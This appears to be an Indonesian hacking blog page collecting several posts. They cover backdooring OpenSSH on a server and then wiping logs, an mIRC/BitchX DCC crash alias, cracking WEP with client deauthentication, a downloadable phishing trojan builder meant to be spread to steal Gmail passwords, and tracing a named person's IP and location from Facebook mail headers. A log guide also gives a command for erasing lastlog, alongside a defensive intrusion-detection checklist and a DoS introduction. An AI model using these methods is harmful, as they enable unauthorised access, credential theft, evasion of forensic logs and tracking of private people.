Showing posts with label Hacking. Show all posts
Showing posts with label Hacking. Show all posts
0

Seperti apa kata pepatah, apabila kalian bisa masuk melalui pintu yang sudah ada dan tanpa merubah apapun dari bentuk fisik pintu itu, maka lakukanlah. Kasus ini sama seperti kalau kita mencoba menginfeksi sebuah server untuk mendapatkan akses secara ilegal.

Dalam sebuah kasus, ketika dilakukan percobaan menginfeksi SSH, ada beberapa trojankit untuk itu, anggap saja kalian pernah memakai backdoor yang disebut dengan nama shv4.tar.gz (release oleh penturichi pada tahun 2002). Tool itu umum dan mungkin sangatlah mudah digunakan oleh para intruder untuk memudahkan mereka keluar masuk server (tentunya dengan fake login). Namun yang menjadi masalah disini adalah efek selanjutnya dari server itu sendiri, kadang yang terjadi adalah rusaknya library dan tidak berjalannya command command yang ada di /bin.

Apakah ada jalan lain? (yang aman tanpa membuka port seperti backdoor yang umum digunakan). Jawabnya ada, dan mari kita mencoba membahas sedikit walaupun penulis disini kurang pandai menjelaskan secara detail dan fokus.

Mencoba menginfeksi openSSH untuk dijadikan backdoor (private) tidak sesulit yang dibayangkan oleh berbagai khalayak/kelompok hacker di Indonesia (walaupun selama ini belum pernah penulis temui the real hacker di Indonesia ini).

Beberapa tool yang dibutuhkan adalah:
1. file openSSH-3.4p1 (http://www.openssh.com)
2. patch infeksi openSSH (terlampir dalam artikel)

Cara mengolahnya adalah:
Pertama yang dilakukan adalah extract file openSSH yang sudah terdownload, kemudian anda patch file injeksi kedalam direktori openSSH anda.

1. # cp ssh-virus.diff openssh-3.4p1/
2. # cd openssh-3.4p1/
3. # patch < ssh-virus.diff

Selanjutnya kita coba tools yang baru saja kita patch kedalam server sendiri dirumah anda. (kalau anda punya) bagaimana caranya?

Pertama adalah melakukan proses konfigurasi dengan cara
# ./configure atau dengan option yang lebih spesifik
# ./configure --prefix=/usr --sysconfdir=/etc/ssh

Kemudian melakukan make dan make install dengan cara
make ; make install

Setelah semua selesai dilakukan yang terakhir adalah menimpa file sshd_config dengan cara:
# mv -f sshd_config /etc/ssh/sshd_config

Selesai menimpa file sshd_config, dan ini adalah sebagai langkah final adalah restart SSH dengan cara

# ps -x | grep sshd
# kill -HUP (sshd pid)

/usr/sbin/sshd yang kita kill disini adalah sshd yang terbaru biasanya terletak pada baris paling atas. Sesudah kita lakukan kita cek apakah pintu masuk kita yang baru sudah berjalan dengan sukses apa tidak?

# telnet localhost 22
Trying ::1...
telnet: connect to address ::1: Connection refused
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
SSH-1.99-OpenSSH_3.4p1

Nah setelah selesai, kita mencoba login kedalam server percobaan:
# ssh -l root localhost
root@localhost's password:
Last login: Mon Jul 28 14:12:22 2003 from bsd0.camne.net
OpenBSD 3.3 (GENERIC) #44: Sat Mar 29 13:22:05 MST 2003

Welcome to OpenBSD: The proactively secure Unix-like operating system.

Wow.. pintu masuk kita yang baru berhasil kita jalankan.. Selanjutnya silahkan membersihkan beberapa log yang tertinggal dengan cara manual atau dengan memakai utilitas yang tersedia. Masih bingung mencari log remover? singgah ke http://sarang.kecoak.org/~scut/release/logremover.txt

Kemudian, apakah hanya sekedar mendapatkan akses ilegal dengan port 22? Tak adakah terlintas dalam pikiran anda untuk mencoba mengintip beberapa password didalam jaringan local dan keluarnya? bagaimana caranya? Be creative!
0

Masih ingat dengan exploit DCC pada mirc yang menyebabkan buffer overflow ?. Penulis yakin kalian masih ingat.

Disini penulis mencoba untuk memaparkan hasil percobaan penulis mengenai exploit ini kenapa menyerang Mirc 6.1 keatas. Dan perlu diingat, tidak hanya pada Mirc saja akan tetapi penulis juga telah mencobanya pada BitchX versi 1.0 keatas dan hasilnya juga vulner.

demikian contoh yang telah penulis coba pada BitchX

/alias /crash { .raw PRIVMSG $1 $+(:,$chr(1),DCC) send " $+ $str($rand(a,z) $+ $chr(32),250) $+ " 0 2130706433 $+(8192,$chr(1)) }

segmentation fault

Dan akan langsung diskonek dari server. Inilah yang terjadi. Nah pertanyaannya ialah kenapa bisa ? Silakan menjawab dari penjelasan exploit di bawah ini

Penjelasan dari script exploit tersebut yang paling fatal sebagai berikut :

$str($rand(a,z $+ $chr(32),250)

Artinya mengembalikan sejumlah karakter secara random antara a - z ditambah karakter ASCII 32 sebanyak 250 kali.

Nah kesimpulan yang dapat penulis petik dari hal tersebut ialah pada irc yang ada ternyata memiliki vulner yakni tidak mampu menerima karakter dengan jumlah karakter hingga batas tertentu yang mengakibatkan overflow.

Untuk lebih jelasnya tentang perintah yang ada silakan merujuk pada Mirc Help. Dan jika ada kesalahan dari penulis silakan dikoreksi
0

Aircrak-ptw adalah tool yang digunakan untuk meng-crack wireless yang diproteksi dengan WEP.Masing-masing notebook dengan spesifikasi berbeda, sehingga cara untuk menggunakan aircrack pun berbeda. Langkah-langkah untuk menggunakan aircrack-ptw untuk beberapa seri notebook adalah sebagai berikut:
ACER 4520, OS Linux Mint Elyssa
Step 1 : Setting wireless card

$ sudo airmon-ng stop ath0

kalau pake “stop” masih “monitor mode disabled”, ganti dengan ” .. start ath0″

kemudian masukkan

$ iwconfig

Sistem harus merespon sebagai berikut :

Interface Chipset Driver

wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0) (monitor mode enabled)‏

Step 2 : Start wireless card

$ airmon-ng start wifi0

“9″ adalah channel yang digunakan, chanel ini bisa dilihat melalui kismet

respon sistem harus sebagai berikut:

Interface Chipset Driver
wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0) (monitor mode enabled)‏

kemudian masukkan

$ iwconfig

dan pastikan bahwa resppon sistem sebagai berikut

lo no wireless extensions.
wifi0 no wireless extensions.
eth0 no wireless extensions.
ath0 IEEE 802.11g ESSID:”” Nickname:””
Mode:Monitor Frequency:2.452 GHz Access Point: 00:0F:B5:88:AC:82
Bit Rate:0 kb/s Tx-Power:18 dBm Sensitivity=0/3
Retry:off RTS thr:off Fragment thr:off
Encryption key:off
Power Management:off
Link Quality=0/94 Signal level=-95 dBm Noise level=-95 dBm
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0

Step 3 : Jalankan airodump-ng

airodump-ng digunakan untuk mengcapture paket dari akses point

$ sudo airodump-ng –channel X –write prefix_for_capture_file interface

misal
$ sudo airodump-ng –channel 3 –write tes ath0

“tes” dimaksudkan bahwa file yang dicapture akan ditulis pada file tes.cap (biasanya tes-01.cap), file .cap tersebut akan di create secara otomatis oleh airodump.

untuk mengetahui channel yang digunakan maka hilangkan channel pada command diatas

$ airodump-ng –write tes ath0

Step 4 : Deauthenticate Clients(optional)

tahap ini dilakukan jika client tidak memberikan ARP request, jadi harus memaksa client untuk men-generate ARP request.

$ sudo aireplay-ng –deauth 15 -a MAC_of_AP -c MAC_client yg_diserang

misal
$ sudo aireplay-ng –deauth 15 -a 00:12:17:A7:AF:E4 -c 00:0F:3D:57:FD:C0 ath0

* -a BSSID/Mac address akses point
* -c MAC Address client

* 15 jumlah paket yang dikirim

Step 5: jalankan aircrak-ptw untuk mengenerate WEP dari akses point.

$ sudo aircrack-ptw tes-01.cap

atau bisa juga menggunakan aircrack-ptw yang sudah dibuild dalam aircrack-ng

$ sudo aircrack-ng -z tes-01.cap -b mac_ssid

misal

$ sudo aircrack-ng -z tes-01.cap -b 00:xx:xx:xx:xx:xx

contoh output :

i $ sudo aircrack-ng -z tohack-01.cap -b 00:xx:xx:xx:xx:xx
Opening tohack-01.cap
Attack will be restarted every 5000 captured ivs.
Starting PTW attack with 261446 ivs.

Aircrack-ng 1.0 beta1

[00:00:00] Tested 81 keys (got 21872 IVs)

KB depth byte(vote)
0 1/ 3 00(28672) 58(27904) 03(26880) 2E(26880) 62(26880) 89(26880) 27(26112) 3F(26112) 0A(25856)
1 3/ 5 8C(27648) CD(27392) 9D(26624) FC(26624) 2B(26112) 87(26112) 14(25856) 77(25856) 7B(25856)
2 0/ 1 EF(31744) FC(29184) 12(28416) 92(27648) CE(27136) 1F(26624) 25(26368) DD(26368) 4C(26112)
3 1/ 6 43(28672) AE(28416) 41(28416) 07(28160) 2F(28160) B2(27392) 5E(26880) CD(26624) 2B(26368)
4 0/ 1 21(30976) 4B(27904) 84(27392) 21(26624) 83(26624) AD(26368) F1(26368) DA(26112) F6(26112)

KEY FOUND! [ 00:xD:EF:xx:xx ] ini adalah key atau password dari wireless network yang didapatkan
ACER 4920, OS:lINUX UBUNTU

Pada acer seri ini wireless card yang digunakan adalah wlan0, dan bukan dengan command ” $ sudo airmon-ng stop ath0″ tetapi

$ sudo airmon-ng start wlan0

untuk langkah selanjutnya sama dengan ACER 4520
BenQ S53W,OS LINUX UBUNTU

pada seri ini wireless card yang digunakan adalah eth 1, dan bukan dengan command “…stop eth1″ tetapi

$ airmon-ng start eth1

Selamat mencoba

Catatan : untuk mengetahui wireless yang digunakan gunakan command ” $ iwconfig ”


"MEMBUAT SESUATU YANG TIDAK MUNGKIN MENJADI MUNGKIN" 
"FRUZI ALBAR FRUZTECKER"
0

saya cuman mau berbagi ilmu pengetahuan aja untuk phising email..
jadi kita dapet email seseorang untuk dapetin email dengan cara memancing korban untuk menuliskan sendiri password emailnya

secara logikanya seperti ini
Builder ini untuk membuat jebakan yang jebakannya itu untuk mendapat password yang langsung kekirim di email kita...

korbannya dengan secara tidak sadar menuliskan sendiri passwordnya karena terobsesi untuk dapetin password orang,,,
passwordnya langsung kekirim ke email gmail kita,,,

jadi tangan takut klo saya akan berbuat jahat...

ini dia softwarenya

http://www.mediafire.com/?5oada5aqvvvvvgk


dan ini screenshot untuk log yg udah saya dapat

http://img80.imageshack.us/img80/682...re00000000.jpg


sedikit tutorial pic untuk menggunakan programnya
http://img525.imageshack.us/i/tutor1s.jpg/
http://img829.imageshack.us/i/tutor2.jpg/
http://img806.imageshack.us/i/tutor3.jpg/



HARUS PUNYA EMAIL GMAIL..

how to use email phising

1. extract rar and get 2 files "nycbuilder and stub" (don't delete stub because you can run builder"
2. open "nycbuilder"
3. Write your gmail account (must have gmail account because only gmail can received) and your password
don't scare to write your password because program will sent password victim and email victim from your own email
4. klik "build"
5. "emailsoftwarehack"created
6. Spread "emailsoftwarehack to forum or give you friend
7. when he have desire to hack someone their will write "their email google and password" and write victim email
8 so their write "email and password" for you
9. Check your gmail and you got email and password from your victim

nb: some antivirus wil detect this program virus, don't scare because antivirus almost detect
direct to email from program trojan. i use this software never got problem

source

"MEMBUAT SESUATU YANG TIDAK MUNGKIN MENJADI MUNGKIN" 
"FRUZI ALBAR FRUZTECKER"
0

Di dalam status yang baru-baru ini, page ini menyinggung mengenai IP Addres. Apa itu IP Addres? Penjelasan sederhana IP Addres adalah pengalamatan komputer kita berdasarkan range-range tertentu. Saya ibaratkan bahwa, jika setiap Handphone memiliki nomer telepon yang bisa dihubungi... Maka untuk Komputer, IP Addres ini memiliki fungsi yang sama dengan nomer telepon itu. Kita bisa melacak, lokasi dengan tepat dimana pemilik IP Addres tersebut . ..

Dan jika sudah mampu mengidentifikasi IP Addres nya, langkah yang paling penting adalah melakukan "tracert, tracking, dan fingerprinting tentang aktifitas nya di dunia maya. Lalu, kita bisa mengidentifikasi siapa pelaku atau admin page ini

berikut screenshot nya:



Oke, terlihat kan . .. apa itu IP addres ,. Page ini sungguh membuat saya marah ,.

Oke, saya akan memberikan contoh. Bagaimana seorang hacker mampu melacak IP Addres pengguna fb ( sebetulnya rahasia perusahaan, tapi untuk kita . .. mari hancurkan ini bersama , jika anda punya cukup banyak nyali )

saya akan memberikan contoh. Tapi saya sebelumnya minta maaf. karena menggunakan akun email lutfi. Just For Educational Purposes Only , ^_^v peace . ..

pertama,
saya memanfaatkan email notifikasi yang masuk melalui facebook. misalnya saya ambil notifikasi email dari Reni Agustiani.


di dalam warna kuning, telah saya kasih tanda. kita lihat header lengkapnya . .. maka akan muncul seperti ini :


dan ini hasil lengkapnya:

-----------------------+(( Header Email ))+-----------------------

From Facebook Thu Sep 10 16:17:22 2009
X-Apparently-To: faujiridwan@yahoo.co.id via 124.108.123.158; Fri, 11 Sep 2009 00:17:27 +0800
Return-Path:
X-YMailISG: l6rUGAkWLDsTMdj3IrahH_sZy1.wTzilIVJvClGVtSZrcmfUfl GIpyEYMD2OyA7iI6mRZvk.9QEmQflPufviZvzvbs5c36R75QGY A9CR6ouMQv.OV.Q7diD78R6cM6xCbIYZRH4PUhreHBF8DkIiXH aEj6nCHI.Qx.53eOTtQwS3uBGbVYqFX2wd2WNV9tEV6TWmQi9A AOt_uAQqgYkHT3Ul5B_Ha6qLvbiydH_LXDtD3thCZm8BXn_Ci8 N9CVRGTlcY_3VW0HdX2Ih7fIReL2OcrLFQsaSDQukwB5j2SNC. uQPk3i7UZHgWD9c6CsLonQ--
X-Originating-IP: [69.63.178.175]
Authentication-Results: mta124.mail.sg1.yahoo.com from=facebookmail.com; domainkeys=neutral (no sig); from=facebookmail.com; dkim=pass (ok)
Received: from 69.63.178.175 (EHLO mx-out.facebook.com) (69.63.178.175)
by mta124.mail.sg1.yahoo.com with SMTP; Fri, 11 Sep 2009 00:17:27 +0800
Return-Path:
DKIM-Signature: v=1; a=rsa-sha1; d=facebookmail.com; s=q1-2009b; c=relaxed/relaxed;
q=dns/txt; i=@facebookmail.com; t=1252599442;
h=From:Subjectate:To:MIME-Version:Content-Type;
bh=ni9Q2ZQv/gbM3B3oiSOmnjRj8Y8=;
b=pqkJ5IBS1A+7H6hMQ/FV61z/6NAu4skBifEKKBH1gmuY/YraNlXNbi9MnIIBCSxl
sZrp9gue3eL2DdbLiYIzmQ==;
Received: from [10.18.255.176] ([10.18.255.176:34214])
by mta006.snc1.facebook.com (envelope-from )
(ecelerity 2.2.2.37 r(28805/28844)) with ECSTREAM
id 79/67-17407-29629AA4; Thu, 10 Sep 2009 09:17:22 -0700
X-Facebook: from zuckmail ([MTI1LjE2MS4xNzguOTI=])
by www.facebook.com with HTTP (ZuckMail);
Date: Thu, 10 Sep 2009 09:17:22 -0700
To: Lutfi Fauji Ridwan
From: Facebook
Reply-to: noreply
Subject: Reni Agustiani tagged a photo of you on Facebook
Message-ID:
X-Priority: 3
X-Mailer: ZuckMail [version 1.00]
X-Facebook-Notify: photo_tag; from=1286103888; uid=1286103888; pid=30382928; api_pid=5523774138248829776; mailid=11323c0G5451ffb4G5de5d5G5
Errors-To: notification+y46j=of9@facebookmail.com
X-FACEBOOK-PRIORITY: 0
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Type: text/plain; charset="UTF-8"
Content-Length: 810

-----------------------+(( E.N.D ))+-----------------------
yang kita butuhkan adalah bugs dari facebook dalam bentuk kode enkripsi base64 di dalam header tersebut.
------------------------------------------------------------------
X-Facebook: from zuckmail ([MTI1LjE2MS4xNzguOTI=])
by www.facebook.com with HTTP (ZuckMail);
-------------------------------------------------------------------
yang kita butuhkan adalah kode ini saja: MTI1LjE2MS4xNzguOTI=

itu adalah kode enkripsi base64 . Pertanyaannya, darimana saya tahu itu terenkoding? di akhir header ada code:
------------------------------------------------------------------
Content-Transfer-Encoding: quoted-printable
Content-Type: text/plain; charset="UTF-8"
Content-Length: 810
------------------------------------------------------------------
so, kalo dah dapet kodenya . .. lalu kita decode ( diterjemahkan encoding base64 tadi ). Kalo saya lebih suka Online ke web ini:

http://www.opinionatedgeek.com/dotnet/tools/Base64Decode/Default.aspx

berikut screenshot nya:



nomer satu adalah query ( masukkan dari encoding base64), nomer 2 adalah IP addres setelah saya tekan tombol decode.

dan IP addresnya adalah: ........................................

jreng , jreng , jreng , ....

125.161.178.92 ini adalah IP Addres dari komputer Reni Agustiani.

lalu kita melacak lokasinya:

masukkan IP Addresnya kedalam web ini ( mencari pakai satelit ):

http://www.ipaddresslocation.org/

berikut option pilihannya:


dan ini adalah hasil nya setelah saya menggunakan IP Locator:



atau, hasil lengkapnya:

_(( Hasil WHOIS ))_

[Querying whois.apnic.net]
[whois.apnic.net]
% [whois.apnic.net node-1]
% Whois data copyright terms http://www.apnic.net/db/dbcopyright.html

inetnum: 125.160.0.0 - 125.163.255.255
netname: TELKOMNET
descr: PT Telekomunikasi Indonesia
descr: Menara Multimedia Lt. 7
descr: Jl. Kebon Sirih No. 12
descr: JAKARTA - 10340
country: ID
admin-c: AN163-AP
tech-c: IS49-AP
status: ALLOCATED PORTABLE
mnt-by: APNIC-HM
mnt-lower: MAINT-TELKOMNET
remarks: For SPAM or ABUSE case, send to abuse@telkom.net.id
remarks: -+-+-+-+-+-+-+-+-+-+-+-++-+-+-+-+-+-+-+-+-+-+-+-+-+-+
remarks: This object can only be updated by APNIC hostmasters.
remarks: To update this object, please contact APNIC
remarks: hostmasters and include your organisation's account
remarks: name in the subject line.
remarks: -+-+-+-+-+-+-+-+-+-+-+-++-+-+-+-+-+-+-+-+-+-+-+-+-+-+
changed: hm-changed@apnic.net 20050902
changed: hm-changed@apnic.net 20051223
source: APNIC

route: 125.161.176.0/20
descr: PT. TELKOM INDONESIA
descr: Menara Multimedia Lt. 7
descr: Jl. Kebonsirih No.12
descr: JAKARTA
country: ID
origin: AS7713
mnt-by: MAINT-TELKOMNET
changed: hostmaster@telkom.net.id 20090319
source: APNIC

route: 125.161.128.0/18
descr: PT. TELKOM INDONESIA
descr: Menara Multimedia Lt. 7
descr: Jl. Kebonsirih No.12
descr: JAKARTA
country: ID
origin: AS7713
mnt-by: MAINT-TELKOMNET
changed: hostmaster@telkom.net.id 20090319
source: APNIC

route: 125.161.0.0/16
descr: PT. TELKOM INDONESIA
descr: Menara Multimedia Lt. 7
descr: Jl. Kebonsirih No.12
descr: JAKARTA
country: ID
origin: AS7713
mnt-by: MAINT-TELKOMNET
changed: hostmaster@telkom.net.id 20090319
source: APNIC

person: Adriansjah Nasution
nic-hdl: AN163-AP
e-mail: adriansjah@telkom.co.id
address: PT. TELKOM INDONESIA
address: Menara Multimedia Lt. 7
address: Jl. Kebonsirih No.12
address: JAKARTA
phone: +62-21-3860500
fax-no: +62-21-3861215
country: ID
changed: yogo@telkom.co.id 20050802
mnt-by: MAINT-TELKOMNET
source: APNIC

person: Iskandar Satyogo Prasetyo
nic-hdl: IS49-AP
e-mail: yogo@telkom.co.id
address: PT. TELEKOMUNIKASI INDONESIA
address: MULTIMEDIA DIVISION
address: Jl. Kebonsirih No.12 7th floor
address: Jakarta Indonesia
phone: +62-21-3860500
fax-no: +62-21-3861215
country: ID
changed: m_untung@telkom.co.id 20040729
mnt-by: MAINT-TELKOMNET
source: APNIC

_(( e.n.d ))_


source


"MEMBUAT SESUATU YANG TIDAK MUNGKIN MENJADI MUNGKIN" 
"FRUZI ALBAR FRUZTECKER"
0

Sering Sekali lamer-lamer mendekteksi jaringan kita baik dengan beraneka ragam cara yang terkadang membuat si admin kebingunggan (panic) untuk melacaknya, untuk itu penulis mencoba memaparkan sekilas tentang langkah-langkah melakukan pendeteksian terhadap sistem yang susah tersusup atau belom tersusup, Benarkan sistem kita tersusup ? (khususnya pada sistem yang berbasix unix ato linux) sebagai jaringan yang paling banyak dipakai saat ini.

Ada pun langkah-langka yang dapat kita tempuh adalah sebagai berikut :

1. memeriksa file-file log, untuk memcari koneksi dari lokasi yang tidak wajar atau mencari aktivitas yang tidak semestinya ada. sebagai contoh , periksalah "last log", proses accounting, semua log yang dibuat oleh syslog, dan log-log yang lain yang ada kaitannya dengan keamaan. bila firewall digunakan atau router menulis log ke lokasi yang berbede dengan compromised system (sistem yang berhasil di-comprimise), jangan lupa untuk memeriks log-lognya juga. sebagai catatan, hal ini bukanlah hal yang mudah dan aman untuk dilakukan, kecuali anda melakukan log ke sebuah media yang hanya dapat diisi dengan mode append (sering sekali penyusup mengedit file-file log untuk menyembunyikan aktivitas mereka).

2. memeriksa file-file setuid dan setgid (terutama file setuid root) pada sistem. sering sekali penyusup meninggalkan setuid dari /bin/sh atu /bin/time untuk memudahkan bila akan melakukan akses sebagai root di waktu yang akan datang. perintah find pada unix ato linux dapat digunakan untuk mencari file-file setuid dan segid. sebagai contoh ada dapat melakukan perintah berikut untuk mencari file-file setuid root dan setgid kmem pada seluruh lokasi didalam sistem :

contoh pemakaian:


fruzi:~$ find / -user root -perm -4000 -print

fruzi:~$ find / -group kmem -perm -2000 -print



keterangan : contoh ini akan mencari ke seluruh sistem / direktory, termasuk NFS/AFS yang dimount ke dalam file system, namun untuk mencegah hirarki tersebut ada beberapa perintah find yang mendukung option "-xdev" . sebagai contoh :


fruzi:~$ find / -user root -perm -4000 -print -xdev



cara lain untuk mencari file-file setuid adalah dengan melakukan perintah ncheck pada tiap-tiap partisi.sebagai contoh, gunakan perintah berikut ini untuk mencari file-file setuid dan device -device khusus pada partisi /dev/rsd0g:



fruzi:~$ ncheck -s /dev/rsd0g



3. memeriksa file-file binary di dalam system untuk memastikan file-file binary tersebut tidak berubah. seringkali penyusup mengubah program pada sistem unix ato linux, misalkannya login, su, nestat, ifconfig, ls, find, du, df, libc, sync. semua file-file binary yang di referensikan oleh /etc/inetd.conf, dan program-program jaringan yang penting berserta library-library berbentuk objek yang dipakainya. jangan lupa untuk membandingan dengan file-file aslinya, hati-hati terhadap backupan jangan-jangan sudah terkena/terinfeksi trojan horse. ( pakailah program untuk menditeksi trojan ) contoh-contoh programnya cmp ato MD5 (program standar yang dimiliki unix ato linux) ato bisa saja anda mengunakan program lain yang bisa anda dapat kan di internet.


4. memeriksa sistem dari akses penggunaan program networking secara ilegal, yang umum disebut dengan packet sniffer. penyusup mungkin menggunakan sniffer untuk menyadap user account dan password : saran penulis gunakanlah :superscan ato sejenisnya..


5. memeriksa semua file yang dijalankan oleh cron dan at. seringkali penyusup sengaja meninggalkan pintu belakang (backdoor) pada sistem (bahkan setelah sistem merasa yakin telah menyelesaikan masalah yang terjadi karena sistem di -compromise). Periksa juga semua program/file yang direferensi (baik secara langsung maupun tidak langsung) oleh job-job cron dan at serta file-file job mereka sendiri, yang seharusnya tidak dapat ditulis secara bebas.


6. Memeriksa service-service ilegal (yang sedang berjalan). perhatikan apakah ada penambahan atau pengubahan secara ilegal pada /etc/inetd.conf, khususnya periksa entri-entri yang mengeksekusi program-program shell (misal nya /bin/sh ato /bin/csh) dan pastikan program-program yang dispefisikasikan di /etc/inetd sudah benar dan tidak diganti oleh trojan horse. periksa juga service-service legal yang diberi tanda komentar pada service-service tertentu (berarti menjalankan service tertentu), atau mengganti program inetd dengan sebuah program trojan horse.


7. Memeriksa file /etc/passwd pada sistem dan memeriksa juga modifikasi yang terjadi pada file tersebut, khususnya untuk pembuatan account baru, account tanpa password, atau penggubahan UID (terutama UID 0) pada account-account yang ada.


8. Periksa file-file konfigurasi sistem dan jaringan dari entri-entri ilegal, khususnya cari entri degnan tanda plus (+) dab bana host yang tidak diinginkan di file /etc/hosts.equiv ,/etc/hosts.lpd dan semua file-file .rhost (terutama root,uucp,ftp dan account sistem yang lain 0 pada sistem, File-file tersebut seharusnya tidak dapat ditulis secara bebas. cari file-file yang tidak wajar atau hidden pasa seluruh lokasi di sistem (file-file yang dijalankan menurut prioda waktu tertentu dan umumnya tidak dapat dilihat dengan mengunakan perinah ls), karena file seperti ini dapat digunakan untuk menyembuyikan tool dan informasi (program password cracking, file password dari sistem lain). sebuah teknik yang umum pada sistem Unix ataupun linux adalah meletakan sebuah direktory yang hidden pada user acount dengan nama yang tidak wajar , misalkan ".." atau ".. "(titik2 spasi) atau "..^G" (titik2 ctrl+G). Sekali lagi, perintah find dapat digunakan untuk mencari file hidden tersebut, contoh :


fruzi:~$ find / -name ".. " - print -xdev

fruzi:~$ find / -name ".*" - print -xdev | cat -v


demikian juga dengan file-file yang memiliki nama seperti misalnya "xx" dan ".mail" (terlihat seperti file biasa bukan)


9. memeriksa semua komputer pada jaringan lokal pada saat mencari tanda-tand adanya penyusupan. seringkali bila sebuah host berhasil di-compromise maka komputer lain yang berada didalam jaringan juga. hal ini bener khususnya bila jaringan menjalankan NIS (Network Information System) atau tiap-tiap host di dalam jaringan saling mempercayai melalui file .rhost dan file /etc/hosts.equiv. periksa juga host-host yang berbagi akses .rhost.



"MEMBUAT SESUATU YANG TIDAK MUNGKIN MENJADI MUNGKIN"
"FRUZI ALBAR FRUZTECKER"
1

NOTE :
1. Artikel ini dimaksudkan untuk bahan pelajaran para admin dan siapa saja yang ingin mengembangkan pengetahuan tentang file-file log
2. Gunakan Tutor ini jika anda anggap penting

File-file log adalah file yang berada di sebuah sistem yang merupakan file-file penting yang senantiasa mencatat semua kejadian-kejadian(kegiatan) yang berlangsung pada sistem. file ini sangat penting pada sebuah sistem untuk memudahkan kita khususnya admin untuk memeriksa dan menelurusi berbagai masalah yang terjadi, dengan file log si admin dengan mudah menemukan sebuah bug, sumber-sumber penyerangan, dan kerusakan-kerusakan yang terjadi pada sistem yang ditimbulkan , walaupun kita tidak mengetahui cara menanggulagi kerusakan tersebut.

File -file log kebanyakan ditulis dalam bentuk file text yang ditulis perbaris (istilah untuk namanya adalah record) oleh program-program sistem bawaan saat kita menginstall sebuah program ataupun sebuah SO (sistem operasi). sebagai contoh misalkan pada saat kita menjalankan perintah su, maka program su akan memberikan laporannya dan membubuhkan ke dalam file log sulog (file ini akan menjelaskan apakah usaha su dilakukan user tersebut sukses atau tidak).


Versi-versi Unix menyimpan file-file log-nya pada direktory berbeda-beda. umumnya file ini berada pada :

/usr/adm ---> Digunakan oleh Unix Versi lama
/var/adm ---> Digunakan oleh kebanyakan Versi Unix/Linux terbaru. dimana partisi
/usr di-mount read only
/var/log ---> Digunakan oleh beberapa versi Solaris,Linux,BSD,dan freeBSD

didalam direktory2 diatas...terdapat subdirektory didalamnya terdapat file-file sebagai berikut

sulog ---> Melakukan log penggunaan perintah su
utmp ---> Merekam setiap user yang tengah login
utmpx ---> Extended utmp
wtmp ---> Memberikan record permanen untuk setiap kali user login dan logout, juga merekam shutdown dan star up sistem
acct atau pacct ---> Merekam perintah-perintah yang dijalankan oleh setiap user
aculog ---> Merekam dial-out modem-modem (automatic call units)
lastlog ---> Melakukan log setiap login user,baik yang sukses maupun tidak
loginlog ---> Merekam usaha-usaha pada saat login yang gagal
messages ---> Merekam output ke "console" sistem atau pesan-pesan lain yang menghasilkan dari fasilitas syslog
wtmpx ---> Extended wtmp
vold.log ---> Melakukan log error-error yang dialami atas penggunaaan external media seperti, disk-disk floppy atau CDROM.
xferlog ---> Melakukan log akses-akses ftp
aculog ---> Melakukan log pada setiap terjadi panggilan telepon yang di-dial
uucp ---> Melakukan log saat terjadi pelanggaran-pelanggaran restriksi atu penggunaan UUCP sistem (biasanya untuk aktivitas seorang user dan log-log file transfer).
acces_log ---> Melakukan log pada saat menjalankan HTTPD untuk keperluan World Wide Web.
syslog ---> Melakukan log proses-proses sistem
dmesg ---> Melakukan log pada saat server reboot
www/access.log ---> file log access web server
www/error.log ---> file log error web server
.bash_history ---> Melakukan log hasil ketikan kita diconsole
...
...
dan laen-lain

sebagai catatan :

1. Jika anda adalah serang penyusup hapuslah log-log tersebut ( root only)
contoh :
gayo#fuck: echo " " >/var/log/lastlog <- menimpa file lastlog dengan character kosong begitu halnya dengan file-file log yang laen. (ini cara manual) .. kalo anda mau cara yang cihuy .. anda dapat menggunakan program seperti remove.c dan banyak lagi sejenisnya yang bisa anda dapatkan di toko2 terdekat ..heee (search dong ke paman google coy)

2. Jika anda adalah seorang admin sering-seringlah memantau file-file tersebut buat backup-an jika perlu untuk per-jam ato perhari (tergantung si admin juga sehh ..) banyak referensi program bantu yang bisa memantau file-file tersebut contoh dengan menggunakan crontab ato at sebagai penjadwalan untuk suatu proses (atur untuk permisi file log tersebut dengan menggunakan chmod 644 )

sintax yang mungkin dapat membantu :
gayo#fuck: find / -name wtmp -print (mencari lokasi dimana file wtmp berada langsung cetak dilayar)
gayo#fuck: find / -name utmp -print (mencari lokasi dimana file utmp berada langsung cetak dilayar)
gayo#fuck: find / -name lastlog -print (mencari lokasi dimana file lastlog berada langsung cetak dilayar)
gayo#fuck: find / -name last -print (mencari lokasi dimana file last berada langsung cetak dilayar)


Beberapa hal peting untuk diperiksa pada log anda :
1.Log pendek atau tidak lengkap.
2.Log yang berisikan waktu yang aneh.
3.Log dengan permisi atau kepemilikan yang tidak tepat.
4.Catatan pelayanan reboot atau restart.
5.Log yang hilang.
6.Masukan su atau login dari tempat yang janggal


"MEMBUAT SESUATU YANG TIDAK MUNGKIN MENJADI MUNGKIN"
"FRUZI ALBAR FRUZTECKER"
0

.o0 Kata Pengantar

Pada dasarnya saya mencoba memberikan gambaran umum tentang Denial of Service atau yang lebih kita kenal dengan DoS. Beberapa pertanyaan yang mungkin bisa terjawab diantaranya :

1. Apa itu DoS ?
2. Apa motif cracker untuk melakukan itu ?
3. Bagaimana cara melakukannya ?
4. Apa yang harus saya lakukan untuk mencegahnya ?

Semuanya untuk anda, ENJOY !!.

.o0 Apa itu Denial of Service (DoS) ?

Denial of Service adalah aktifitas menghambat kerja sebuah layanan (servis) atau mematikan-nya, sehingga user yang berhak/berkepentingan tidak dapat menggunakan layanan tersebut. Dampak akhir dari aktifitas ini menjurus kepada tehambatnya aktifitas korban yang dapat berakibat sangat fatal (dalam kasus tertentu).

Pada dasarnya Denial of Service merupakan serangan yang sulit diatasi, hal ini disebabkan oleh resiko layanan publik dimana admin akan berada pada kondisi yang membingungkan antara layanan dan kenyamanan terhadap keamanan. Seperti yang kita tahu, keyamanan berbanding terbalik dengan keamanan. Maka resiko yang mungkin timbul selalu mengikuti hukum ini.

Beberapa aktifitas DoS adalah:

1. Aktifitas 'flooding' terhadap suatu server.
2. Memutuskan koneksi antara 2 mesin.
3. Mencegah korban untuk dapat menggunakan layanan.
4. Merusak sistem agar korban tidak dapat menggunakan layanan.


